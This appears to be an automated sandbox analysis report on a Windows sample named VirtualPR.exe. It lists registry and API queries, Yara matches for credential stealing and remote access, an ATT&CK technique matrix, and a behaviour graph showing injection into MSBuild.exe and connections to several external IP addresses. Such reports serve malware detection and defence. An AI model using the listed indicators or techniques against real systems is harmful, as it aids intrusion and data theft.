                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIdJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIdJump to behavior
                  Source: C:\Users\user\Desktop\VirtualPR.exeQueries volume information: C:\Users\user\Desktop\VirtualPR.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Temp\VirtualPR.exeQueries volume information: C:\Windows\Temp\VirtualPR.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_035F6324 GetLocalTime,22_2_035F6324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_0383EEBC GetUserNameW,22_2_0383EEBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_038D821C GetTimeZoneInformation,12_2_038D821C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_03AA7B04 GetVersionExW,22_2_03AA7B04
                  Source: C:\Users\user\Desktop\VirtualPR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.4557432637.000000000388B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2728, type: MEMORYSTR
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2728, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.35d0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.4557432637.000000000388B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2378527968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2214849304.00000000073F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2202796339.00000000066C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.2388879028.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VirtualPR.exe PID: 2184, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2728, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 22_2_039CB454 socket,htons,inet_addr,bind,listen,closesocket,22_2_039CB454
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping2
                  System Time Discovery
                  Remote Services111
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  Data Encrypted for Impact
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Registry Run Keys / Startup Folder
                  412
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop ProtocolData from Removable Media22
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Registry Run Keys / Startup Folder
                  2
                  Obfuscated Files or Information
                  Security Account Manager4
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Multi-hop Proxy
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Software Packing
                  NTDS65
                  System Information Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets111
                  Security Software Discovery
                  SSHKeylogging12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials2
                  Process Discovery
                  VNCGUI Input Capture1
                  Proxy
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Masquerading
                  DCSync131
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                  Process Injection
                  /etc/passwd and /etc/shadow3
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1620350 Sample: VirtualPR.exe Startdate: 20/02/2025 Architecture: WINDOWS Score: 100 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for dropped file 2->77 79 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->79 81 11 other signatures 2->81 7 VirtualPR.exe 15 18 2->7         started        12 VirtualPR.exe 14 2->12         started        process3 dnsIp4 65 147.45.44.68, 49709, 49801, 80 FREE-NET-ASFREEnetEU Russian Federation 7->65 57 C:\Users\user\AppData\...\OneDrive.url, MS 7->57 dropped 59 C:\Users\user\AppData\...\wbuje1zp.cmdline, Unicode 7->59 dropped 61 C:\Users\user\AppData\Local\...\wbuje1zp.0.cs, Unicode 7->61 dropped 63 2 other malicious files 7->63 dropped 83 May use the Tor software to hide its network traffic 7->83 85 Writes to foreign memory regions 7->85 87 Allocates memory in foreign processes 7->87 91 2 other signatures 7->91 14 MSBuild.exe 7->14         started        17 csc.exe 3 7->17         started        20 csc.exe 3 7->20         started        31 3 other processes 7->31 89 Injects a PE file into a foreign processes 12->89 22 csc.exe 3 12->22         started        24 csc.exe 12->24         started        26 MSBuild.exe 12->26         started        29 MSBuild.exe 12->29         started        file5 signatures6 process7 dnsIp8 93 Found API chain indicative of debugger detection 14->93 49 C:\Users\user\AppData\Local\...\saruzovf.dll, PE32 17->49 dropped 33 conhost.exe 17->33         started        35 cvtres.exe 1 17->35         started        51 C:\Users\user\AppData\Local\...\wbuje1zp.dll, PE32 20->51 dropped 37 conhost.exe 20->37         started        39 cvtres.exe 1 20->39         started        53 C:\Users\user\AppData\Local\...\doceyppt.dll, PE32 22->53 dropped 41 conhost.exe 22->41         started        43 cvtres.exe 22->43         started        55 C:\Users\user\AppData\Local\...\ouz2pkol.dll, PE32 24->55 dropped 45 conhost.exe 24->45         started        47 cvtres.exe 24->47         started        67 127.0.0.1 unknown unknown 26->67 69 196.251.86.101, 443, 49712, 49732 SONIC-WirelessZA Seychelles 31->69 71 196.251.86.102, 443, 49718, 49753 SONIC-WirelessZA Seychelles 31->71 73 185.122.171.132, 443, 49724, 49765 LEASEWEB-NL-AMS-01NetherlandsNL Netherlands 31->73 file9 signatures10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.